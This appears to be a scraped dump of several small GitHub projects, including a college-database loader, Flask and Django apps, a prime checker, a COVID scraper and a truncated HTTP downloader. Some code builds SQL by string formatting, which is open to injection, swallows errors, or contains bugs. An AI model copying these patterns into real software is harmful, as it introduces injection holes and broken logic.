if(m==branchlist[n]):\r\n sql='INSERT INTO `degree_college_branch_relation`(`DegreeId`,`CollegeId`, `BranchId`)VALUES(\"%s\",\"%s\",\"%s\")'%(did[j],cid[i],bid[n])\r\n #print (\"\\nCollege id:\"+cid[i]+\"\\nRecruiter id:\"+rid[r])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\n #print(\"\\n\\nDegree Id:\"+did[i]+\"\\nColleg Id:\"+cid[k]+\"\\nBranch id:\"+bid[n])\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Err\"\r\n\r\n#loop for filling out the relational table between college id and recruiter id\r\ntry:\r\n for i in range(0,c1):\r\n #print (\"\\n\\nCollege Id:\"+cid[i]+\"\\nCollegename:\"+collegename[i])\r\n for m in collegerecruiters[i]:\r\n #print m\r\n #print collegerecruiters[i][m]\r\n for r in range(0,r1):\r\n #print r\r\n if(m==recruit[r]):\r\n sql='INSERT INTO `college_recruiter_relation`(`CollegeId`, `RecruiterId`)VALUES(\"%s\",\"%s\")'%(cid[i],rid[r])\r\n #print (\"\\nCollege id:\"+cid[i]+\"\\nRecruiter id:\"+rid[r])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Err1\"\r\n\r\n#loop for filling out the relation table(course_degree_college_relation) between courseid,degreeid and college id\r\ntry:\r\n for m in mapping:\r\n for i in range(0,c1):\r\n if(m[2]==collegedegree[i]):\r\n sql='INSERT INTO `course_degree_college_relation`(`CourseId`, `DegreeId`,`CollegeId`)VALUES(\"%s\",\"%s\",\"%s\")'%(m[0],m[1],cid[i])\r\n #print (\"\\nCollege id:\"+cid[i]+\"\\nRecruiter id:\"+rid[r])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Error\"\r\n \r\n \r\n #print(\"\\n\\nCourse Id:\"+m[0]+\"\\nDegree 
Id:\"+m[1]+\"\\nCollege Id:\"+cid[i])\r\n\r\n \r\ndb.close() #close the database connection\r\n" } ]
3
juanmsv/recycleDVHS
https://github.com/juanmsv/recycleDVHS
8bdfcf4008fc1fd1bd079f50a993b9f86700c63e
e373beef076c746f7f7ac4396106c5f95bfafa39
c8cd3f72484966068d6e224d903c4c8789ce5784
refs/heads/master
2020-09-23T10:54:32.859414
2020-02-24T23:16:41
2020-02-24T23:16:41
225,481,993
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6584699749946594, "alphanum_fraction": 0.7158470153808594, "avg_line_length": 37.52631759643555, "blob_id": "5a6f5207d9760657fe073f06a2e01221260bda40", "content_id": "f498993175bbbc6e8011af58bca210bf4dd9005c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 732, "license_type": "no_license", "max_line_length": 129, "num_lines": 19, "path": "/README.md", "repo_name": "juanmsv/recycleDVHS", "src_encoding": "UTF-8", "text": "# First Flask App\n\n## Instructions:\n\n1. Fork this repo by clicking the **Fork** button at the top right of the GitHub window.\n3. Open a new console and type `git clone https://github.com/code2collegeorg/first_flask_app.git`.\n4. Press _ENTER_. You'll see some text indicating that git is pulling down files from GitHub. It should look something like this:\n```\nCloning into 'first_flask_app'...\n 1 <html>\nremote: Enumerating objects: 11, done.\nremote: Counting objects: 100% (11/11), done.\n 1 <html>\nremote: Compressing objects: 100% (10/10), done.\nremote: Total 11 (delta 1), reused 10 (delta 0), pack-reused 0\nReceiving objects: 100% (11/11), done.\nResolving deltas: 100% (1/1), done.\n```\n5. 
If everything worked, you're all set!\n" }, { "alpha_fraction": 0.6657963395118713, "alphanum_fraction": 0.6657963395118713, "avg_line_length": 22.9375, "blob_id": "92ef81b62ef5f06d4d5a04e9fd39d60a7e93d88c", "content_id": "164b60bdf8e02d3f196a8f94cd60bac1b32cf48c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 49, "num_lines": 16, "path": "/flask_app.py", "repo_name": "juanmsv/recycleDVHS", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\[email protected]('/', methods=['GET'])\ndef main():\n return render_template('main.html')\n\[email protected]('/about', methods=['GET'])\ndef mission():\n return render_template('about.html')\n\[email protected]('/petition', methods=['GET'])\ndef petition():\n return render_template('petition.html')\n" } ]
2
ConCEAT/Prime_Numbers
https://github.com/ConCEAT/Prime_Numbers
da9025b55c38363afe689163d378b3a793ac3826
32d4967323a87512edf50a1caf78b8bba75a40f6
2b30e9263f896dfa8584b70ce4d317996a05cf14
refs/heads/master
2020-08-22T00:21:08.310954
2019-10-20T19:47:27
2019-10-24T16:05:20
216,279,626
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5603038668632507, "alphanum_fraction": 0.5735992193222046, "avg_line_length": 25.350000381469727, "blob_id": "84f6f519efc131311232dff6ce557fcc9d0cc94a", "content_id": "6e6503a4c29bfc1bfc330eb638f08fc803a3c87c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1053, "license_type": "no_license", "max_line_length": 64, "num_lines": 40, "path": "/source/Prime.py", "repo_name": "ConCEAT/Prime_Numbers", "src_encoding": "UTF-8", "text": "import math\n\ndef getNum(text):\n if type(text) != str: raise TypeError('text must be string')\n while True:\n try: num = int(input(text).strip())\n except ValueError: \n print (\"Integer needed.\")\n continue\n if num > 0: break\n print (\"Number must be positive.\")\n return num\n\ndef checkIfPrime(number):\n if type(number) != int: \n raise TypeError('number must be positive intiger')\n if number <= 0: \n raise ValueError('number must be positive intiger') \n if number < 4:\n return number != 1\n if number % 6 not in [1,5]: return False\n divisor = 5\n while divisor <= math.sqrt(number):\n if number % divisor == 0: return False\n while True:\n divisor+=1\n if divisor % 6 in [1,5]: break\n return True\n\ndef checkRange(start, end):\n return filter(checkIfPrime,range(start,end+1))\n\ndef Main():\n start = getNum(\"Start: \")\n end = getNum(\"End: \")\n print (*checkRange(start,end),sep='\\n')\n \n\nif __name__ == \"__main__\":\n\tMain()" }, { "alpha_fraction": 0.5698427557945251, "alphanum_fraction": 0.6022201776504517, "avg_line_length": 29.05555534362793, "blob_id": "ac8efa1b9b6e74333c40904f3374c819fb9fda25", "content_id": "0cf2be9c229413ce504dcb8c96a2a560488e7d2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 79, "num_lines": 36, "path": "/test/Prime_test.py", "repo_name": "ConCEAT/Prime_Numbers", "src_encoding": "UTF-8", "text": "import 
os\nimport sys\nimport unittest\n\nsys.path.insert(0,os.path.split(os.path.dirname(os.path.abspath(__file__)))[0])\nfrom source import Prime\n\nclass TestCheckIfPrime(unittest.TestCase):\n\n def test_primes(self):\n numbers = [2,3,5,11,19,101]\n for number in numbers:\n with self.subTest(case = number): \n self.assertTrue(Prime.checkIfPrime(number))\n\n def test_nonPrimes(self):\n numbers = [1,4,6,25,1000,18]\n for number in numbers:\n with self.subTest(case = number):\n self.assertFalse(Prime.checkIfPrime(number))\n\n def test_values(self):\n numbers = [0,-1,-121]\n for number in numbers:\n with self.subTest(case = number):\n self.assertRaises(ValueError,Prime.checkIfPrime,number)\n \n def test_types(self):\n numbers = [1.4,'4','four',2+5j,0.0,True,[]]\n for number in numbers:\n with self.subTest(case = number):\n self.assertRaises(TypeError,Prime.checkIfPrime,number)\n\n\nif __name__ == '__main__':\n unittest.main()" } ]
2
ChihChiu29/FireChat
https://github.com/ChihChiu29/FireChat
d084370ee88754dbb53b5801edc8f55d68752ccc
75353013367925fc8e6a170ba0d0c7e60deced16
0fa72880c7849ec2d6f03a5f5b2a56996e432986
refs/heads/master
2016-09-11T08:51:02.879704
2015-04-12T05:47:23
2015-04-12T05:47:23
29,353,997
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7964601516723633, "alphanum_fraction": 0.8053097128868103, "avg_line_length": 36.66666793823242, "blob_id": "ef1bde0d50cba9ea6f4efa92e43a29be5615337c", "content_id": "e7072dfe327a736629f566d8cadc0d62baca7e70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 113, "license_type": "no_license", "max_line_length": 54, "num_lines": 3, "path": "/app_engine/static/firechat-web/nbproject/project.properties", "repo_name": "ChihChiu29/FireChat", "src_encoding": "UTF-8", "text": "file.reference.static-firechat-web=.\nfiles.encoding=UTF-8\nsite.root.folder=${file.reference.static-firechat-web}\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.5994694828987122, "avg_line_length": 28, "blob_id": "ce4451a93a6fdc316d1505101378c6096d654039", "content_id": "1743894a0137ab63f8db1c733c470eb39b4ae707", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 377, "license_type": "no_license", "max_line_length": 78, "num_lines": 13, "path": "/app_engine/main.py", "repo_name": "ChihChiu29/FireChat", "src_encoding": "UTF-8", "text": "import webapp2\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n self.response.headers['Content-Type'] = 'text/html'\n self.response.write(\n '<h3>Welcome!</h3>'\n 'Please go '\n '<a href=\"/static/firechat-web/chat.html?key=\">here</a> instead.')\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n], debug=True)\n" } ]
2
bramuel/NLP-Django-v2
https://github.com/bramuel/NLP-Django-v2
794afe33b9fffa6fb67efc36918764f042a93a05
a7c596ee6db36a432acaffba5f02fdc7236ccd48
75ed305f8108f953b2823d7a9269ff62e4b7226f
refs/heads/master
2023-04-13T06:59:39.676354
2021-02-18T09:37:05
2021-02-18T09:37:05
339,998,157
0
0
null
2021-02-18T09:27:01
2021-02-18T09:41:33
2021-04-16T19:11:17
CSS
[ { "alpha_fraction": 0.5583756566047668, "alphanum_fraction": 0.5609136819839478, "avg_line_length": 19.263158798217773, "blob_id": "4dec853736788077bcededc14dea205512b7b5f2", "content_id": "9009f1663a0e322be4343a87115cfe9203fc1819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 394, "license_type": "no_license", "max_line_length": 75, "num_lines": 19, "path": "/r/r2/forms.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import PostQ\n\n\nfrom django.conf import settings\n\n\n\n \nclass QuoteForm(forms.ModelForm):\n class Meta:\n model=PostQ\n fields=('author','body')\n\n widgets={\n 'author':forms.Select(attrs={'class':'form-control'}),\n 'body':forms.Textarea(attrs={'class':'form-control','rows':2}),\n \n }\n\n " }, { "alpha_fraction": 0.5824345350265503, "alphanum_fraction": 0.6016949415206909, "avg_line_length": 35.05555725097656, "blob_id": "a4b9feea496de0531f3b7c0782e9062b9e4e0755", "content_id": "864e8bc52f688a5a94d1f08b8250e92ab273cb08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 123, "num_lines": 36, "path": "/r/r2/migrations/0002_auto_20200817_0559.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2 on 2020-08-17 12:59\n\nimport ckeditor.fields\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('r2', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PostQ',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('category', models.CharField(max_length=255)),\n ('created_on', 
models.DateTimeField(auto_now_add=True)),\n ('body', ckeditor.fields.RichTextField(blank=True, null=True)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ('likes', models.ManyToManyField(blank=True, null=True, related_name='blog', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AlterField(\n model_name='category',\n name='name',\n field=models.CharField(blank=True, max_length=255, null=True),\n ),\n migrations.DeleteModel(\n name='Post',\n ),\n ]\n" }, { "alpha_fraction": 0.6974637508392334, "alphanum_fraction": 0.6974637508392334, "avg_line_length": 31.352941513061523, "blob_id": "c0481b25ad99d87d9d116e9e6cb1bc161623ebeb", "content_id": "2e553b6a47ca3de1e478a3ed45e1246fe02abdc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/r/r2/urls.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom django.conf.urls import url\nfrom django.conf import settings \nfrom django.conf.urls.static import static \nfrom .views import QuoteView,AddQuoteView,QuoteCategoryView, Auth, display\n\n\n \nurlpatterns = [ \n \n url(r'^$',QuoteView.as_view(),name='quote-detail'),\n path('add_quote/',AddQuoteView.as_view(),name='add_quote'),\n path('quote_category/<str:cats>', QuoteCategoryView,name='quote_category'),\n path('meme_lord/<str:auth>',Auth ,name='meme_lord'),\n url(r'^results/$', display, name=\"disp\"),\n \n] \n\n" }, { "alpha_fraction": 0.5068870782852173, "alphanum_fraction": 0.5674931406974792, "avg_line_length": 19.16666603088379, "blob_id": "11a4e5ee41d0ae28c8a50839c08be080d29f2b5d", "content_id": "fe22c3ccba242b14c52f0fc7a644ae0feaeca01f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 51, 
"num_lines": 18, "path": "/r/r2/migrations/0005_auto_20200818_2040.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2 on 2020-08-19 03:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('r2', '0004_post'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='postq',\n name='body',\n field=models.CharField(max_length=255),\n ),\n ]\n" }, { "alpha_fraction": 0.8205128312110901, "alphanum_fraction": 0.8205128312110901, "avg_line_length": 28.25, "blob_id": "ad42f4fb3a87ef8d8eaa61862836afb8d837eecf", "content_id": "275d62410d394bdba3533246287296664d6da816", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/r/r2/admin.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Post,PostQ\nadmin.site.register(Post)\nadmin.site.register(PostQ)\n" }, { "alpha_fraction": 0.754601240158081, "alphanum_fraction": 0.754601240158081, "avg_line_length": 22.285715103149414, "blob_id": "00fe81da4baab24bf34bdab72807dfc526098fd1", "content_id": "dc41bbf49ecc473007448e215840e7c02461face", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 163, "license_type": "no_license", "max_line_length": 69, "num_lines": 7, "path": "/r/members/urls.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.urls import path,include\nfrom .views import UserRegisterView\n\nurlpatterns = [\n path('registration/',UserRegisterView.as_view(),name='register'),\n\n]\n" }, { "alpha_fraction": 0.5388813018798828, "alphanum_fraction": 0.5402455925941467, "avg_line_length": 24.275861740112305, "blob_id": "7d90b45b37c23f93cad0270015d3ae6a862a864e", "content_id": 
"6f9932c764d9c9e165d5f0879cb4302ba821dc38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 733, "license_type": "no_license", "max_line_length": 80, "num_lines": 29, "path": "/r/r2/serchx.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from .modules import *\n\nclass SearchView:\n def __init__(self,keyword,min_videos):\n self.keyword = keyword\n self.min_videos =min_videos\n\n\n \n\n\n\n def postl(self,*args, **kwargs):\n transcripts_url = \"data.csv\"\n if self.keyword and self.min_videos:\n min_videos = int(self.min_videos)\n\n dataframe = read_data(transcripts_url)\n video_ids = tf_idf(self.keyword, dataframe, 'body', self.min_videos)\n video_urls = []\n\n for vid in video_ids:\n url = dataframe.loc[vid, 'id']\n video_urls.append(url)\n\n context = { 'videos': video_urls }\n print(context )\n return video_urls\n return 0\n" }, { "alpha_fraction": 0.5836177468299866, "alphanum_fraction": 0.61774742603302, "avg_line_length": 18.53333282470703, "blob_id": "fccd159daf1a4733a081160ea287b5260f279b5c", "content_id": "c884b73c940ae43ef36c68926e1cf66a167095f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 49, "num_lines": 15, "path": "/r/r2/app.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "import uvicorn\nfrom fastapi import FastAPI\n\napp=FastAPI()\n\[email protected]('/')\ndef index():\n return {'message':'Hello stranger'}\n\[email protected]('/{name:str}')\ndef get_name(name:str):\n return {'message':f'Hello,{name} '}\n\nif __name__ == '__main__':\n uvicorn.run(app, host='127.0.0.1', port=8000)\n" }, { "alpha_fraction": 0.6006516814231873, "alphanum_fraction": 0.6068066358566284, "avg_line_length": 30.397727966308594, "blob_id": "7c4b63994e8914ceed78134cfa3b12f0805dd1e0", "content_id": "58100daacdb958865ffaf58080bd4067835110af", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2762, "license_type": "no_license", "max_line_length": 102, "num_lines": 88, "path": "/r/r2/views.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.shortcuts import render,get_object_or_404\nfrom .models import PostQ,Post\nfrom django.views.generic import ListView,DetailView,CreateView\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom .forms import QuoteForm\nfrom django.contrib.auth.models import User\n\nfrom .modules import *\n\nqueryset = PostQ.objects.all()\n\n\nclass QuoteView(ListView):\n model = PostQ\n template_name= 'index.html'\n\n\n\ndef QuoteCategoryView(request,cats):\n quote_category_posts=PostQ.objects.filter(category=cats)\n return render(request,'category.html',{'cats':cats,'quote_category_posts':quote_category_posts})\n\n\ndef Auth(request,auth):\n obj=PostQ.objects.filter(author=auth)\n auth_posts=PostQ.objects.filter(author__exact=obj.id)\n\n return render(request,'author.html',{'auth':auth,'auth_posts':auth_posts})\n\n\nclass AddQuoteView(CreateView):\n model=PostQ\n template_name='upload.html'\n form_class = QuoteForm\n ##fields='__all__'\n\n\n\ndef query_to_csv(queryset, filename='items.csv', **override):\n field_names = [field.name for field in queryset.model._meta.fields]\n def field_value(row, field_name):\n if field_name in override.keys():\n return override[field_name]\n else:\n return row[field_name]\n with open(filename, 'w+', encoding='utf-8') as csvfile:\n writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL, delimiter=',')\n writer.writerow(field_names) \n for row in queryset.values(*field_names):\n writer.writerow([field_value(row, field) for field in field_names])\n\n\nquery_to_csv(queryset, filename='data.csv', user=1, group=1)\n\n\n\ndef display(request):\n if request.method == 'POST':\n if request.POST.get('keyword'):#if 
request.POST.get('keyword') and request.POST.get('videos'):\n post=Post()\n post.keyword = request.POST.get('keyword')\n post.min_videos = 10 #request.POST.get('videos')\n post.save()\n q= Post.objects.all().order_by('-created_on')[:1]\n \n query_to_csv(q, filename='serchin.csv', user=1, group=1)\n d = read_data('serchin.csv')\n key = d['keyword']\n key = key[0]\n url = d['min_videos']\n url =url[0]\n sl = SearchView( key,url)\n s2 = sl.postl()\n \n if len(s2) == 0:\n return HttpResponse('Not Found')\n url=[]\n for i in s2:\n c=PostQ.objects.get(id=i)\n url.append(c)\n context={\n 'url':url\n }\n \n return render(request,'create.html',context)\n else:\n return render(request,'index.html')" }, { "alpha_fraction": 0.8165137767791748, "alphanum_fraction": 0.8165137767791748, "avg_line_length": 35.33333206176758, "blob_id": "e49f460c0c6819479e3cb21ee153ee18db2f1718", "content_id": "63db8a48588374853eeaf12f2cd707da7a10be1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 54, "num_lines": 9, "path": "/r/members/views.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.views import generic\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\n\nclass UserRegisterView(generic.CreateView):\n form_class=UserCreationForm\n template_name='registration/registration.html'\n success_url=reverse_lazy('login')\n" }, { "alpha_fraction": 0.4787878692150116, "alphanum_fraction": 0.6863636374473572, "avg_line_length": 15.5, "blob_id": "ec0d6148dcefbd124da9c455a66d3783a49a3084", "content_id": "3b45bca866f34922083370010c2fa2514d287411", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 660, "license_type": "no_license", "max_line_length": 25, "num_lines": 40, "path": "/r/requirements.txt", "repo_name": 
"bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "appdirs==1.4.4\nastroid==2.4.2\nclick==7.1.2\ncolorama==0.4.3\ndistlib==0.3.1\ndj-database-url==0.5.0\nDjango==2.2\ndjango-ckeditor==5.9.0\ndjango-js-asset==1.2.2\nfilelock==3.0.12\ngunicorn==20.0.4\nimportlib-metadata==1.7.0\nisort==4.3.21\njoblib==0.16.0\nlazy-object-proxy==1.4.3\nmccabe==0.6.1\nnltk==3.5\nnumpy==1.19.1\npackaging==20.4\npandas==1.1.0\nPillow==7.2.0\npsycopg2==2.8.5\npylint==2.5.3\npyparsing==2.4.7\npytesseract==0.3.5\npython-dateutil==2.8.1\npytz==2020.1\nregex==2020.7.14\nscikit-learn==0.23.2\nscipy==1.5.2\nsix==1.15.0\nsqlparse==0.3.1\nthreadpoolctl==2.1.0\ntoml==0.10.1\ntqdm==4.48.2\ntyped-ast==1.4.1\nvirtualenv==20.0.30\nwhitenoise==3.3.1\nwrapt==1.12.1\nzipp==3.1.0\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7250000238418579, "avg_line_length": 29, "blob_id": "05386591fc36c97ef83e8f59cf5ccf96317ce299", "content_id": "befd6e30d388d98a3b8273bf2f104897e2473ed2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 80, "num_lines": 28, "path": "/r/r2/models.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import reverse\n#from ckeditor.fields import RichTextField\n\nclass PostQ(models.Model):\n author=models.ForeignKey(User,on_delete=models.CASCADE)\n category=models.CharField(max_length=255)\n likes=models.ManyToManyField(User,related_name='blog', blank=True,null=True)\n created_on=models.DateTimeField(auto_now_add=True)\n body=models.CharField(max_length=255)\n\n def total_likes(self):\n return self.likes.count()\n\n def __str__(self):\n return self.category\n\n def get_absolute_url(self):\n return reverse('quote-detail')\n\n\n\n \nclass Post(models.Model):\n keyword = models.CharField(max_length=255)\n min_videos = 
models.IntegerField()\n created_on = models.DateTimeField(auto_now_add=True, null=True)\n" } ]
12
ssungs/covid19-cases
https://github.com/ssungs/covid19-cases
770de606bebd700339ab87be1bd4a8cee5fefdca
9048b1e52a2b029305104e01bcbfd0a2799a0db4
aac32404c0db4ef983cde3718c16f6d1b3341fb7
refs/heads/main
2023-03-07T00:36:03.830296
2021-02-18T17:08:00
2021-02-18T17:08:00
340,082,817
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6604166626930237, "alphanum_fraction": 0.6937500238418579, "avg_line_length": 25.66666603088379, "blob_id": "37a88a26e2e983bdf0d83d200358753571f813b2", "content_id": "079ebece23b7eea5e09a2355b15366dd38b602ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 480, "license_type": "no_license", "max_line_length": 76, "num_lines": 18, "path": "/server.py", "repo_name": "ssungs/covid19-cases", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom covid19_cases_data import Covid19_cases_data\n\n\napp = Flask(__name__)\n\[email protected]('/')\ndef index():\n cases = 'Covid19 cases in Korea'\n return render_template('index.html', cases=cases)\n\[email protected]('/covid19_korea_cases')\ndef show_user():\n casesdata=Covid19_cases_data()\n return render_template('covid19_korea_cases.html', cases_data=casesdata)\n\nif __name__=='__main__':\n app.run(host='localhost', port=8119, debug=True)\n" }, { "alpha_fraction": 0.6881188154220581, "alphanum_fraction": 0.7153465151786804, "avg_line_length": 35.54545593261719, "blob_id": "7d639e69dfea1f1c398eafdddd933fc7c396b3be", "content_id": "e564049a4190f8dd4ba0e00cbe1076440e3f9d7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 105, "num_lines": 11, "path": "/covid19_cases_data.py", "repo_name": "ssungs/covid19-cases", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport lxml\n\ndef Covid19_cases_data():\n url = 'https://en.wikipedia.org/wiki/Template:COVID-19_pandemic_data/South_Korea_medical_cases_chart'\n response = requests.get(url)\n html_text = response.text\n soup = BeautifulSoup(html_text, 'lxml')\n class_id = soup.find_all('tr', attrs={'id':'mw-customcollapsible-2021feb-l15'})\n return class_id\n\n\n" } ]
2
harshs404/pythontutorial
https://github.com/harshs404/pythontutorial
d6c2855fce6ca533abc1d0a6924e86be60771d3e
c26fd17783d83e452d8ff206da79bdd91f308afb
057850146c5de633c64c749b0197bf532fa1387c
refs/heads/master
2022-07-09T07:08:44.348345
2020-05-17T16:14:08
2020-05-17T16:14:08
264,706,909
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 26, "blob_id": "c02069389f1d5bb7949d5742a30198b4e17796d7", "content_id": "152ec8e1828f0a1c5e9cb6314d8e3c0f7b9e3da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27, "license_type": "no_license", "max_line_length": 26, "num_lines": 1, "path": "/helloworld.py", "repo_name": "harshs404/pythontutorial", "src_encoding": "UTF-8", "text": "print('hello, i am harsh')\n" } ]
1
lanpangzhu/multiget
https://github.com/lanpangzhu/multiget
9b3c878d2ed4680236d82bbfc3477da1f7836373
55e691a1eea488bcf7a59a54e4a072aedbe50311
b522a9c3799b03aac991c9e67a44e077d868b6ba
refs/heads/master
2020-04-29T19:40:07.450114
2019-03-21T19:37:36
2019-03-21T19:37:36
176,362,899
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6382121443748474, "alphanum_fraction": 0.6635334491729736, "avg_line_length": 30.59393882751465, "blob_id": "f44f98a5848019d64b86b2b24110efd164887a91", "content_id": "dcddc15b28fef636df761112aadfd8dde5d80d59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5213, "license_type": "no_license", "max_line_length": 122, "num_lines": 165, "path": "/multiGet", "repo_name": "lanpangzhu/multiget", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3.5\n\nimport argparse\nimport requests\nimport sys\n\nMAXSEGMENTSIZE = 2**20\nSEGMENTS = 4\n\n#address = \"http://speedtest.ftp.otenet.gr/files/test1Mb.db\"\n#address = \"http://speedtest.ftp.otenet.gr/files/bogustest1Mb.db\"\n#address = \"http://speedtest.ftp.otenet.gr/files/test100k.db\"\n#address = \"http://www.gutenberg.org/files/100/100-h/100-h.htm\"\n#address = \"http://f39bf6aacfdfbf.bwtest-aws.pravala.com/384MB.jar\"\n#address = \"ftp://speedtest:[email protected]/test1Mb.db\"\n## head --bytes 4m 384MB.jar > small.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smallfinal2.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smallfinal3.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smallfinal.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a small.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smalltest.jar\n\n\ndef check_arg(args=None):\n \"\"\"\n handle command line parameters. paralel is not supported,\n but will be worked on as for the segments and sizes this works\n when the numbers are correctly divided. this will not work say\n if we select zero or perhaps if segs is one, but the server does\n not support ranges. Since i reckon you don't want to flood the network\n with http gets i limit the choices to 1 to 32. 
the limit for max size is\n in the main portion.\n \"\"\"\n parser = argparse.ArgumentParser(description='muliGet')\n parser.add_argument('address',help=\"HTTP URL to download\")\n parser.add_argument('-parallel',action='store_true',help='Download chunks in parallel instead of sequentially')\n parser.add_argument('-o',type=str,default='mult-get.out',help='Write Output to <file> instead of default')\n parser.add_argument('-segs',type=int,default=SEGMENTS,choices=range(1,33),help='Number of segments to read and write')\n parser.add_argument('-maxsize',type=int,default=MAXSEGMENTSIZE,help='Max Size of segments')\n\n results = parser.parse_args(args)\n return results\n\ndef get_header(address):\n \"\"\"\n get the file header to make an initial attempt at the file to see\n file size and to see if the server supports the range option\n the assumption here is that only HTTP is to be supported since only HTTPS\n was excluded explicitly. \n \"\"\"\n try:\n retval = requests.head(address)\n except Exception as e:\n print(e)\n print(\"Verify the URL please, only HTTP is supported\")\n retval=None\n return retval\n\ndef get_chunk(address,chunksize,chunknum):\n \"\"\"\n get the chunk determined by segment size and the number\n of chunk in the order of the four fetched. 
